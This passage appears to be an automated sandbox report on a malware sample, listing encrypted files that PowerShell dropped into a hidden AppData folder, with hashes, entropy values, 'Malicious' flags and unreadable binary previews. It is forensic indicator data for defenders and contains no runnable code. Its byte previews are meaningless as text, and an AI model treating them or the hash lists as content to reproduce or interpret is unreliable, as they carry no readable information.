                                                                                                    SHA-512:3F7D504B17369BB87F9B5EDAE73C4633C6E0AE70A28F9297936846E44477F4F5E9178BBAC60683397D80AD15D730D094B1AF96BE3E8E209E1399AC5EBFD5697E
                                                                                                    Malicious:true
                                                                                                    Preview: yn9f..e.e..]H.h. .@^'.U......^#..~.....M..L9?..f..?.^........[6...A....X..."..e.fzO5...0ig.,/.e=.E.x..G... k$.....|m...e..`...)..Shu...2!q7.Q.v...^..1.\Am.w.g.G..i.A..;.V...!...X.V..3.O....z.ro.,A....G=...ng...HE.\R.}.0.6.F.....9...HaI..3Qb..*)......".-tYn.zy...)o6.....Of....lU$..&......\....[.......6j.8..Q.$T....=....TA.7R..axhP......(P...e.n:...6..j.(..-..3....{.|...xXFj.~`.2....y.lE...,a...B8....i..I<..p.{.,......t.,.L.j........)#...7...k..k{lA.f.....-.p.s.\.V....[.....W...e#h..7"%...Q/.Q......~.....!P...m...N.pe.V.GZ.5....&.....O....\yf...)m2w{.F....II'........`1.\..p..Ev..,.M.?9N/RY.....e..K.....@...V.......1.s.n....S........ad..,;t....B.."6...n.<c...j&...3...D.p2-%=.K.b.B..Y..y'6w?j...-..l...I.M.H.a./..(},..K...u0.#.r.S..<3....B...H.c...TB.!.i......8........>......,{dA..Z...c.........ZG!..W...<...d o.eX..g+..#.pP..Z.T<.Dy.q?..Te..0.._c1...tv...O..S...:.....1.#..........e...GJ.....mRc;..._.S...c<...<.`5..'i..Fyk}3.`...TN.]K.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JncQjmMbqKTUzr.HNAmYrCiyGUOblqLox
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161532
                                                                                                    Entropy (8bit):7.998803328719341
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:h6FHIBLqSFxsjO+Y+UDPHED5oQzGRV498vYf9mK5FwkJgwE7rjD:oHIFrFx4Op37H2GRV422wKfwkJLcrv
                                                                                                    MD5:2D1D47BF5BB427C5F71A9DA7AC7F9F49
                                                                                                    SHA1:4A8158DA83A104770BA113D74CC483D4062E1C14
                                                                                                    SHA-256:57C7579F74B7726C6128728E45932E1B2F02A42898FA49B3E64D9CDD485D9B62
                                                                                                    SHA-512:10AB1378776F9142280CA855552CE664A58844E6C534A41A369836734B2EF3608285F5854F9A93D3629A85D1EF6E185EB9B94784B9AF4C960615CA2B1DDDE64F
                                                                                                    Malicious:true
                                                                                                    Preview: `Y.Y.l.o..F.I.W2....DbG...|s...U.4.S.Q;..Y......+...B.......cEBZn....x..u....H....6{.{.l+.\m....K...............8MXz+.....K.R....z..A...N.E......b..(oG...p.0...H...m..d`g<g't.M.......K.~W..-8!.*t.H9sx..2.l'N".:.f..g..".p..J........3z..{.../4...T...%..k.w#.fA.I...2R..e.D.@.tg.\...F".N/..UXgw.w._V....&,......U."......D.F.{.A.....9.....kz5D...v...R........e........6.~\....Li..5.E..!.`..{.Bp.F.y..\.Q.8.....+...C?.v..j...'.+.<.N>......^.'P....h.'.....O-....#.;.\.OvXY.*|.=.|....:...A.....K.......vK.._7.n.M.!....^....5.l..;.$FD.ao...]..t[..)..m.p.}6......kJ;......0.6N.W&...a;o..+...&oB.....i...oZ/.l.,.h../.dUp..}....%FR....q.fXd#?..U..1.6oiE./N*z.f..&...M.......q....EOL..E.EGp..@......+.Hql9c.qd.T!]...l....v~u.T0...3.;$0.q>}.<..3.Y..JTd.$i...b.2._...9eOG-.%...A9...........u..L<.... D..&.||...(.`...d.~.R.P.v\....M.A.....>{......3.RK..k_0.....9(..j.}$..4?^L..Yrp~<jF06.}Z.I.zs{...i...|.b...9e..L....."qqO...........H..j@z...&.../..d.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JtxafTOLCmGpXon.LuSVrUEzvH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124427
                                                                                                    Entropy (8bit):7.998477108923858
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:bltdb6Ef4hDeAaXFXWD0Z/SblBZQyX6Gu9mA+OH6pg/ZpV5he:Ey49eX20Z/aTZQ5M1eRphe
                                                                                                    MD5:B983433C9A89725B9C4E7B1415752E88
                                                                                                    SHA1:118E4CFD9D4795A9F1CA5727E6B5ECE8578F19AF
                                                                                                    SHA-256:B3BC2A03ADE0654B2C3456006C41048F9933EA425D173CDD0B76ABEBC9AF3904
                                                                                                    SHA-512:B330387D11B5B1E765F6760820ECD6321D9BB62554D944CC10FD649B3EB22A2BD168310936E764948ABF5CA5459BEF7B859712583B52DEEB610F97DA6D9F87BE
                                                                                                    Malicious:true
                                                                                                    Preview: ......s...:N.C.u.a......E.%...K.D.....k.W..[n.............*.x..t..v.l.x......Y..!....v/...A$.E...:^w`...... ..Q.`....F..~....5....$...P..Y..{~s.....{.~&.J...C.(...Q.*;.......DxWj....G....].=rWY.=.."........P..."bpr...P...p......5.....(.ZYX..O..a4....Q.{E'....V..T..[..D.'..5!.ENS..c...-g.6De..,...P.....L*T...'..u..!...f..3..l8c(..z..._..KW....cF..........u.......K...P..|>t{ &]..?...JJG.....5. v3.O..G..M...Ny..M5e...@..z..l..[...<.z.MQ>...).../..k....1+..D...[....'..... ...<= ....>,...!....)#+\.k.r....r..?.{b#....l...K...I....O........B....<.../W.>..'...Cx..w^,..\..,..b.....J.o....pO.mA].%..~R.D+3Jc.y.AE...]........zM...?..4..UC......l..a....%cg!I..^+.\A[7....V.1.BJ.p..1k(.......-I...S+..^.W.~H1r...u....[Lb..,.2P(.t.9....D..........:6......42.$.U.......2vwpG...5.B....n........N<..Q.0...J.eL......b........d...}......a..f_'.........1.8.%`...k.......Ms...r...P.sZ...k...<.9.....).:=Qfn2.F{.}.b...*W.Pn.G....5.z.U[5.=K..d...........`.@..P........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JzICspvGYNHr.rVpbfIRKceX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):199171
                                                                                                    Entropy (8bit):7.999115570944138
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:XiuRSmF5N/0+Ot0ey/HSGdWlqyDHOpsdDYNJP:fSm/NvOmjdqLipcDYbP
                                                                                                    MD5:4B1781892CA0B628F301E3A1A992D760
                                                                                                    SHA1:00E4A0B021BF82BEF25DA791BE8B9A274EC016DD
                                                                                                    SHA-256:20EDEA881D7455D3DBF46C8CF71333ABA74B12790043E3E4BC9AEF8F951B2315
                                                                                                    SHA-512:E22D45FE7B3800CA26CD6BF2B3F9EF78DBC52EAABC280ABBA32E568ADDB46266685679DFE649D1928024F2A724170F27A5597C199FF5033A9828882A3E4B6448
                                                                                                    Malicious:true
                                                                                                    Preview: d........j$C5k.h....$...b...(L...z....W.6.l..e..1..Y....@.q..3B.c.Q..e&z...C7...\,..Y..0p.F./Y..].n.....zx..:.k,t.c..~.!&D.fKY...f..YE............~...<....,Lm....K.I......+{bC...,B...|.5...%f...G/m...x.(.a@iB...b..0...{l..i...m.`5XON.?|..b....+G.....p<.,8.....<s4.On.*f.....~X..M...L....C+j....vb...v4...9...C*^4.v..3=...:Ga......s.s..Y...fc.@Y.0d.z........5..u..#Y.5.%d.v.Q..4.n{...8.......yr.nx..c.:.b.....a66nfuh.vN3.......H......w....c;@A...I..`10".x....U..d#,...._..P*....-...m.X.'.$.I/.^+..Ix..`...h...V_..BQp.L...:.D.....ZH...y.P`...-..L.d..'W.....P.T..2D..-.2...=J...Z\.D.....+.y.Q......+24".lC?......|....O.....S.s^b$N.>a.........F..DN.0..&y7.-....cEpdfjk%.a....~..$j...":.T.....Y.. K..[.`........v.o.nB,..D.W...:.^Y.?.p+I.(..NR.....G....q.....Vv.506l....%&..C.~?.s..n.P.,pn.!...q.."..v....*.!2..?Y]..+@#.?l|.1w:.[^yq....m[.BM.X......B.Y..K..}..C.k...[.ir.=.s.._o._.N.. ...i...PN.......%....B+7.l.Re....=>Z...j.'U..(I.....2^#.....*..=~.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KHGtwVZTBQqYjUei.gELZdHkeSxKOzFjIh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):177413
                                                                                                    Entropy (8bit):7.99901852624988
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:KJATuJ2jJwl5B+wNpBHKKbGKt4E7WCG9g6QJakZ/DQaeowf/n0OrcGQ:DTuJ2c5BHNp8KbXD729GtmaeLPHrQ
                                                                                                    MD5:1A41DDB70BF381CCC6E84205117A1EB3
                                                                                                    SHA1:A22FE532743550BDE1D5CF2C11B686FBB952C270
                                                                                                    SHA-256:45016A88F0D2EFA414CAA726716401C9BFA568E0C06621005C23AEB6A5361144
                                                                                                    SHA-512:611AD68D7AD7405C160F4311F5618FD42B63D682B87B64EB179F04D9BD0733A2A0D24B03746F557F843D71E8448F86C94A8A18913895DFFE8BD1791B06D19856
                                                                                                    Malicious:true
                                                                                                    Preview: ..h....4..L....>.@D.....#w.O.L.9.+.#.BR9..m..(.<_e.....Vmdu............G..M........B....e...u...pC..;..J.i...Q..gj.N. ....e....F....z.bX..uRH%....u....Y0.S..y..H....b.....?^..J....u<!.}..(..r.!%0-.nT)........./.E..ma...\...&..8..Y&<...2a....`..-Mh.....,.,.....S........"/.L.........,.CDa&l..GNT.o.!$K.../..nH..7.;..?..}g.Y.e......4.&....L.$.).{....._.F|./...^Y(...e <m+R.C.0...d8Iu.. .tYJ.Y..^..z..y14X.8}...... .U{9~..#D.kx...Rd...@/(..u.k.._....^........O-..o*.a..K...6[.1...-.;.g..(.Oj.'.H...@H9.EMf%.;V...."f...!9....n....[.......V...6..D.i..{0dN.D.b|1.?j-....5.K.4X.86.....wx..W....6^...}M.Q.4S.p..W...C.>....B.......V.l..9D^.W.....I..GP l4..[....%..&.)RV.....<?.L....<y......d....2.l....>.<.@..........p./.e.s.....?....8<.uV...U.t.wI'S...8.{.(....B.W#.LB.t/..3.0E.g.....s;L.............xvFH.........;......... ..l.'..Z...smAT..Q....&....d.[..'.w........X.k.Z.9|..V.F....F.Gh.Ln....>..H.A%.D.."*....E..C..Q%c3....\>..WY..\..=#$=...FW.. ..r..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KORBQhiEWj.FGNnjuCxzpTisyBv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86753
                                                                                                    Entropy (8bit):7.997629558137622
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:baMJjgi5n+Rbvp2nt5mc1GnBRcgOMwQmNagcYY+MaA1/Ok6Q2Q2NuWhy0z:WMRz21m5D8BSg1wHVS+Mnr6Q2RNuWw0z
                                                                                                    MD5:59063ACBE313E252394CD92ECD162687
                                                                                                    SHA1:BC05C2FA4BF5C71BD9CD1A30F791C9BFEE6C5CB6
                                                                                                    SHA-256:308584BA5785009FB3B73F1446AFAAC494813C66FEBB5C44CC33AECFB69A6ECC
                                                                                                    SHA-512:EF8577CE4F35C0C9C49B9D629BD44C67C8E2BB348D2EA8B5DA65D5548C7F352DF194851291477D604A891E5208A9748968220D51C2F550E56D55C8A1152AAD3B
                                                                                                    Malicious:true
                                                                                                    Preview: xGJJp..m..../?.%...T.I.....)H..2'aB...`.!k..a...}.w.s2/...&.$&......%.$.2z...3r/...d./..=...F....M.X.R$A.....n..YP|D.....{..3.]..%l.s.6?rwi.B....K....o..M...(J.I...F..'.i....F./..v.k.+....f...O.....2.V+...P.=!.k<....c...4...&..>.G...>@:cq.N..m.l.Z.%Z*..S.(..I...A.[..W..Jpd.N."..S....T......(.Y.F.0....|[.K..0...nOT...I.?.<"q.........*<....&....')..Y......(...MH.W...j.bah...}........~0.e.!.......,.C?...U.....<)..........AwP.Oo..3....O)......|w..s.`.}:.OD.e..&'.....6....J/]..:7...<SF.b..#.#...D...c=F..`.}.1*...=d..F-.,........-..!..G...}..~\.'.^Z....ZG:......B..[..H.u.2798..6Tz....a.......;...m...b!7H......^.....o.IK...GI.v-...A._...]O^...Jg...\cj..u....7r.D.>.!.I........Ad..E.z..Q.V..".....'..~.W.......]C....R.V'.../.F.<G.b.....'..E...H.F.wj .........9.*.rD./......48..c..B......./t.x. .26..G.0.G.G.dl...E.Z{M.K_.....(.kuga-........&.(..3..Q. ..oUW......W...H...S~...)`.N......t'..{-'.c.v3}.....$.....A.f......=....Q..p....xz..@...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KPLJQWVbrwdC.ZyTduYaMxjG
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135882
                                                                                                    Entropy (8bit):7.998754648518999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZmIjCCvS5fcMHCbM0RGf9NW6W/kYrTU5NUJgYjd5agTK:HeCvUUMHVBfMMYsrIgEd5aWK
                                                                                                    MD5:F1A8F93EDA2AE7E23A3CA9CB7ADDCB82
                                                                                                    SHA1:A53322D6576A033957E7A53886729BB7F6DB1310
                                                                                                    SHA-256:AA60A608042FAB1C28287E90451896B4BD9EBC7CE660C7BB4D909DE260311238
                                                                                                    SHA-512:DF5E6B288E63408ADF9757A58184983292915524136B1AB54477D3D874367D104D3C0611FF193945F141209E6507C0423584F62F3929450F6F534D6C5817DC57
                                                                                                    Malicious:true
                                                                                                    Preview: .lg.Q$.,..3......,e..[...Z-}.v^.......|.j.L...x....}.1..M.8..r.....:......mU..v..k..8.F..V...............p-..,.<..u.....*.oj...:.....0.l.f...?..h........o.\.J.)..i.U..~+..c.0.P....s*....A.<.t..}..$......P;q..j...R...p*?..A.Ls..++).aE6..Q.<.p.>..h.b.....5.X>v...S<......o.l..tdw..Li.|1......9.mt_....bPa....n.....g.........3V&R.^v.4...\......D.....uA..pl.od.....Q.V.N.c...$...l.Z .u.4. y...5....Xz.WJ..;....qwu..'.z....58..u..........i.9i..0.53.Ws/.Y.].!../..#]^.."..[.XC...0m..i..{..8...TWs....YS.[.#.h....v:V.^.........2..d..:.W..a.....8T.c..n...@...P..Z..w..m..bD...[..E..B......#...-......:.f..h.N@r.r..7...Zi..J.P.3.>C..L..i.OWq...)0F.`.'tX.n...b4.....~}.oV..b...'x..LV.w..../.6.q..$.,.x.y.jG.[....G.U..g.l.q....Z...L$`..I.J...:.M.dx.o...'....y....c.."....Y.].x`...:.N....X.1..........<.c.b.....]l.W.?.%S..1..E.|..!l.@..p.*..%U.66<.G...e..t...m.....V.`.2..Hy.....BG...Fs.......f.EL.0M(D.W.>V.. ..:.>..T+.Lu...I.h.....A.......{K..6~L.......tz.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KfqcBmRSYPI.wkHbjJsPoNZuFMKGt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75858
                                                                                                    Entropy (8bit):7.997672381284279
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kJBkuwySo5zijVpQu7yEQyLvHp1ZFggmVrrMkkE/9Ne9Mrzb+Rgc:FkA32EQOfp1ZFkVrrT7/WJ9
                                                                                                    MD5:1C804333DC31CB141A79BB6DAAACB39D
                                                                                                    SHA1:9EE5179E6F964529F6CEFC02EC592C95C2E58446
                                                                                                    SHA-256:0EE182B786F161EC27B531597286B39A51884107C68E70CCD198BF3599D12B87
                                                                                                    SHA-512:75882FD34995F9E68391154FE7544DAA51ACA548559AC49CD7149F97EBE2C7D50396AE93F1235DA72F60CEB560A684ED4824520BD5603D6079AFB305F29497B0
                                                                                                    Malicious:true
                                                                                                    Preview: m.."./-.CC6..D........:K..(3...T.+.w.Rx..s#.0zV./.PtMR....WW.X...B.247w..(...@e.`|..K..M!PN.6.@..h...<....3Vz.G..T..7....'~..(......E@0.2.(Y..9....X...44&..l.u..p>p.F......K.o.w.H.L.l.$......>..d5...c..(.0..C...Ss.B..4K.6.5.>_...9.........$..a.r...1.K6,.jkZ..h.~.?..%0['.j.s7.0.......A7y.$q....3=..w.i#B...3.<.o.v..a.HU.S..T.}b.W3.y..q...I...T.OlX..g...J. .m4z...hLo.........J%...~j.Q.j.3...........~.q?h.U)/...\.*W.V?;.....M...gr.P>.. .z....KT..1.U..{Xd...t..%.s.wQ5.....[L].Q.5..h.0dB...uPb.v..HC....;.?....^..X.......z..7.Lm..)...9..-..D7.Hl.w.....m/..1....5CqV!..i.v......zIA...,.g..iR)+...q...l.#. .`.....03tD...f.^M..=.T.r..V..N...%..>..Ma...[.o...2q.#.g..Z.U&8...j6 .....X(..m....}.......2x.Z./..J..b.F.....@..<..'...P........b..6t.8....).I.j.;..`.E. .FQ.}..'.k.w.rd.1.O&omh?%S...m.p=S..0...<.kG..rYW.....`..v)..Spjb:t.rt05V.. ...]..?.zj.i...^"`...5....t....].i]Iy!h0....?_V..3...DsF..vA..s.U.-..>0.\M.,o..W.k^EUy..f.L..t.M^4..y..J.>.%C.=OX..o#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60928
                                                                                                    Entropy (8bit):7.259541896711919
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:IdZNNZ7lUK8tIawWgypP7Vvu6ibgUrjHonU:wZW7uakM7Vm6izrjHonU
                                                                                                    MD5:14EF053A57A4ACFDB53E2E0E50CE7D64
                                                                                                    SHA1:0EA36AA28BED676CC4DFDDF0511593167A67BFBE
                                                                                                    SHA-256:326A04F6BA5D93E2ADE8D5E96C16AC0CEC570C9B67BDA85EF51D63EBA4257400
                                                                                                    SHA-512:EF6DE4D8FD1B6503CA486BEE4C240EE8FFAF8E604192481E4A0E9B9CC7F4FFF80B400E2749FC063D115E1A6F8E3DAAA6D10E818F822EEBA96515579C6B5F4B0E
                                                                                                    Malicious:false
                                                                                                    Preview: ...uOWVAgzZM..B0.iZiXk5F.1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4.3I9@Z.>Z.m.v.P .. $3..D''.C85.27)WD.. =D./&p..S..<P5.-.~J[oF0BhYD1i4tZg/1pw.#b.T1FCI3Rj.Sm.jh:SM.1xbPBhQW9g}PO9cdB9e.8mUUZgJxJrYnBsei1JbWZ6fFhjPnBOe.Wlaosxflp1LW..cmJzQ{xqdEAyP#BqLTkzEnl7P3x+ZnVO.~m2.2tpR.eT|Ph0Z3stPg==QFVuLWVAc:[MUUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NeF0RkdxWHQlI0tLRN14.Ht1YX1QVG9+JD' .jZHd.xsYxopX.IxPEVeb0BhYD1id1ZgC0s.v.F.71FCQ0RjLsn3am1SM.1xbVBhQW9gSUN9#DByKC\.:6ZwFXJrY,Csak1Jb.Z6bFhjPnBOekVl!ms:flp1OWQwcmZzQkxqt@PyP3Bq.TkzWni7@.x+..VOczl2V2tpR3dTdSh0Z3stPg==QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSKd=1.Uh2bFBCS.JtV;MLo.4hM.i4Z9I>M*@0Zad.8OQlC0s[5f14_Hs66Q1Q\@V!d0H7ojZB\4tsYRbpQd^.]GVoq4By]F'k.X5ic0ywX.!.P%.BZ4Cma[~7.f1SG0.xk9RhQ]3g.GG-.EQ>t6.j\:UwJRJ.Yk-yai;..Q._:.|jPoQJb.\lageiczw^EWQ}..rkQkrqbS@|W\HqL^..S...A3x!Z.S\dQl#P.tpS/dTfS&0Kls`Pg==SF.uw)VSczZMBeG0ShZiZk5WK.heUfXUp.81T:m2cLBTP^HtV;FM U4hGt7.N3I8EG.Y]..!.\QlH<vK].X.FHt;YZ6.?O/#.YjIdjPHV@.gYXep^{&pPG\ed6-aYD;o.;Zgi_fwXg8.X1FIZ7Rb?Eo3kz4S\58n
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KuibdswUXWGkVCv.HmAwfRjGSeOnrZy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76418
                                                                                                    Entropy (8bit):7.997203294822315
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:NZVM5GZSN/9pD9qw/N8Gq17sYg2KGJUflwxPZfcUwDICRr1zHgcUauk3439E:egIpVhAiGJCWPZfcPICcpo43O
                                                                                                    MD5:2444A42B3822B2D7FF668EE8C9FDB222
                                                                                                    SHA1:9F7D88E051103AFE491EA28FD42DCF674A3C452C
                                                                                                    SHA-256:D8473C5662D386D430B67B86E48ABD7505685B1D96C7F132933B7C44B6365F03
                                                                                                    SHA-512:20A855F3702B4C73A5BC205AC9A674436A61CCA34C3F2CEF279B9D98569650A23B11E69B486B3BEC8ADA25CD8ED6D8054A1D7B4A2A64212684E6685D088C103C
                                                                                                    Malicious:true
                                                                                                    Preview: `..........n..dI....1.....).BJX.II......9o........@..!>...2.3....>{.o.....@d=..v..u...(.....>............6.........Hi.#S.......gbJ..V..i.1.5...%.....g...5..KD..>.p..q...?.ld}X.`l...-%_7..o.....Hyb....y'......f.t[J..lfo..Com....X.'...z._.....!=.J....@...C8....c.L4......."1..>%...3.x.A&.;..EQ...........~.LT.....0..Z..{f....._.T..H,..[/..RFv}....:...7<B....j .s..h.......xo.R....oGeA....YF.B....E.;v.....[.t..,R.V..PQ..5.`.....3..m.+.R......l.6.U...Oy.6.....l[.D.....6........ Z$HG.....&.....4K.e.P..R..b.A....i.#..&.MQl?f..^..\m6.1].....r.....8.7.m........S...F.U_........#.n..Mr........V.....+E.J.).. ..@..}M$.W.S....!...M.C.<.Z.)D...).6...r~7o.5....M..;.V@@J....h..P...J}.a...Z..Y.^...J.n..O.Y..J.%..a.0lG.x.|o......1.KQ}\...z>...w......].......4L~...uy..9...82r.Z|Z.xb....9.O.6+.......QU.....s..P..$sJ&W...L*.-..}T.....T.C.#$e#...f..j......*..6 ...(64...k..t..)%.c\...^.,.f.)/R[.$ob..|.....x......g.c6.....;.hq^?.H"....I....)$k.u.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LJznrKxpyev.SVONxUmwgskphGZndz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):188317
                                                                                                    Entropy (8bit):7.999033855662001
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:k61j/vwjQvJt9FaAL5J3tP4w48nC6RSnsh2IieDDl2OddeUJo6+vHlEQ77VjgfJs:HjoUHBf9Pd48GsIiDUCdJgvH17VyfjDC
                                                                                                    MD5:DCE7BED8C88B7F4FD63C36C7702D0211
                                                                                                    SHA1:08ECB49199CFB1BCDF37E99539A4270B1A34FFCC
                                                                                                    SHA-256:B98F5852446A22F31BE33E8589A7C5ED41D46B73242E7CEDCF3A7B825635358A
                                                                                                    SHA-512:3C5C4BEDCBBE3E09481B13B3F6F5A1F8AB017C1914F8E7457E00247E3EC2E28A09B9C8E8B217B46B440A6748B558445AF92D4C2F52D29230E9514EDE2617A94A
                                                                                                    Malicious:true
                                                                                                    Preview: .......F..>5..g.Z<.....'. s.L$..w...Y.8.;-tK...J..B.{..p....N.=.I......L.O...4..(.0..9.k.lCo....1........@:T...U%.../F.Q .rK....O..].jU.X...h...Y.I#....:...>...c.B..A.2.m..w..Mz..;..I.....m.......d...../W.R.P-Li..p.;|.g.z.S..l....Ln......7g?...UI..D.wbD.w.o.......i.d....J...}N.~..*...lDH....'..`+I.+.c.c....' ...x..v..t...4".Z..#X....(.........?U...g...../..:e...p....6.o...z^.a.P2...L-+]...u_...eY...&1.U...P......A.n.>.L.O..x....c...}D.d.....K.....K.j.k[...........T.yu..N7.."h1.\..$.."..v4....G...l_r.\..#...o...$...r....A..Pki.#U.\._..tm..`..8D[..>...dn..o.K...a...L...W|t........R...F.......0.....6;.....eC...`.Fd.f.T.Y.@.U^..+.....c.T..@D.9.....6.L..c..oW.M..A.D..b.4......hI.2......0EV.p...c........._..6..k..2..6l.I.....8..^.G...g.4.l...0(....wb..@...m..#G...T.7..!...r...D..%..[...p.y..h...V...h..S5.v...K..!4.#.W..nc..S....~.#.%..kFH.....^q...Mn2..!...c.6.Y.'.c.........i.C...qS.....a...z}.%.w..zj.]..`=-}P..4b..m...../.....Y........c.4
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LaiGpcVSKO.fQkenRdrZDxuIm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171437
                                                                                                    Entropy (8bit):7.999037514146617
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0zmCogHxHL6mkSbAPiJaKOdOrxNoyt0xg/PwauU66MKaHQVvBF6fOTAhQB:TgRrHtMP6SW7fw2X3aHqnX
                                                                                                    MD5:96A1093175523457F5C5E64BE1241D96
                                                                                                    SHA1:C344B63E499CDFE47EF1A4B2F5A2E6BEC970E23D
                                                                                                    SHA-256:56F1A026AACA780D3701F2B5A4B5982521223E89E15F9D761A2088FE009A412A
                                                                                                    SHA-512:ED36BD17B42C84A74B561AC3B8D600DF06E9FBD8E8CFAC4B193DD05983F6592B51365F40FA255ACE4FED4AEA64CA38373F9B72F52C8F9952EB28DBCE9DDC83F3
                                                                                                    Malicious:true
                                                                                                    Preview: x.Ts.)7.>.`Xy.....c=.....wwX..^.-.m..i..g../I.6..<.xv....t..N.Z.*.r...I.c.}..@W'nEL...mU.og...........<-.).q.'$.Os...6...M.s.....'.A.....+....r.|D....._MR<..@az..V.2\N.%....M.....5.>^....a...c+?ru..N..d.*.a....E...p.b...D.!c...3i......Jn....P..2...........4.............9=P..E.OK.....j......!.qI.|G..N...je......F.."-......%..:...E8z.(....5.%...S.&...*.K...Q+.H.'.o..3.6.|..Kkk.>.A_.........C.......j,..J)...*..C...9Oa%<.g....m.D/d.2n.4..gY/.O...N.FU...&4p......r..|............F..l....d$`..K.wLh...].G..i.s_.....VJ....'..B.OU;.K.a#.}9...J.g`.,..!.....5.....F7.p.fw.D...L.t!.LL..a...Sm..a.".../.`.....].^U...N7Tx..P..g.......`.$.....(...q.`O.q.......N....a=".byO.2.'C...b./.../j..9&...L.K.4|..q"P.....X.JSF>.1...)S..Mq.~l)...C${D.y\D>p]..?..7.`m....3D..O....M.!..Y....:..2..4.`yB....X......nL...h...5.;N3.L.WZ.75....<_1.;.u.f..4.Y......|.U..8A.......<.*I.#.4.v..P..u......Y%d*B"..5g...<.cjy...A.w..?...:.G....k5,A...d..OJy :8...Z..`.WS...~..Z.....^#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LnDTWobsjHC.xTrXzAtEpWvI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):184806
                                                                                                    Entropy (8bit):7.999085224842976
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:/dY3aYG5iHKRWQgxfsAF13nLaZ9X+WCqd8xOttg3Wiy6fzrxdXtr94hY9qpI9Ebe:+BqRWQgzWZ9X+BfMPh6fzrxdXZ9EZI9J
                                                                                                    MD5:7957DDA36188A0C636FEC7903E110C6A
                                                                                                    SHA1:D522DFF3420CCADAECFAEFF96E143725750029B4
                                                                                                    SHA-256:1CBE03FF6BA8D1425A212EA502672233D6D83F80CBE3745E4B80F68D4FD7D419
                                                                                                    SHA-512:0F0484A55374B5CDBC2CE48B6A8E3D66BB8395FED801B6CCB1E5DA4D63294972B73DC4348BF555C94B91B1D4084DA8C4F6667E55F89DE7B55B18C3A19B8F2E6A
                                                                                                    Malicious:true
